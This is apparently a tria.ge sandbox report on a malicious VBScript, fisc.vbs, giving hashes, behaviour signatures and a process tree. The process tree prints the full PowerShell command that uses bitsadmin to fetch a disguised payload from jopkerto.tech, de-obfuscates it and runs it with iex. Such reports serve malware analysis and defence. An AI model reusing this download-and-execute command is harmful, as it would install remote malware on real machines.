Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
01/06/2023, 13:52
230601-q6laesee79 601/06/2023, 13:51
230601-q6be8aeh6y 601/06/2023, 13:49
230601-q4w9xaeh6v 601/06/2023, 13:48
230601-q4bcfaeh51 601/06/2023, 13:45
230601-q2vy3aee58 601/06/2023, 13:42
230601-qz6msaeh5t 725/05/2022, 10:04
220525-l3xrtsdfbm 7Analysis
-
max time kernel
139s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
25/05/2022, 10:04
Static task
static1
Behavioral task
behavioral1
Sample
fisc.vbs
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
fisc.vbs
Resource
win10v2004-20220414-en
Behavioral task
behavioral3
Sample
ykfoxibh.pdf
Resource
win7-20220414-en
Behavioral task
behavioral4
Sample
ykfoxibh.pdf
Resource
win10v2004-20220414-en
General
-
Target
fisc.vbs
-
Size
607B
-
MD5
7e9280027235462727a9a351429725c6
-
SHA1
380f1b3eeb2779a4359e4ca52471273983ed684c
-
SHA256
11a9b5a24b628be56d2d2bedf1ed71f05114c2f670cd1814ff8f8ff222cd801a
-
SHA512
7e31dcff6590b79476bb9bedd73145b9acafea62202d8defdd12608eae4cf727dce8781b83cd14d51432f2989bc6376c0a5bb8a114397c504a1ea4d519b4e060
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 3612 bitsadmin.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2996 powershell.exe 2996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2996 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 624 wrote to memory of 796 624 WScript.exe 78 PID 624 wrote to memory of 796 624 WScript.exe 78 PID 796 wrote to memory of 2996 796 cmd.exe 80 PID 796 wrote to memory of 2996 796 cmd.exe 80 PID 2996 wrote to memory of 3612 2996 powershell.exe 81 PID 2996 wrote to memory of 3612 2996 powershell.exe 81
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fisc.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"2⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg4⤵
- Download via BitsAdmin
PID:3612
-
-
-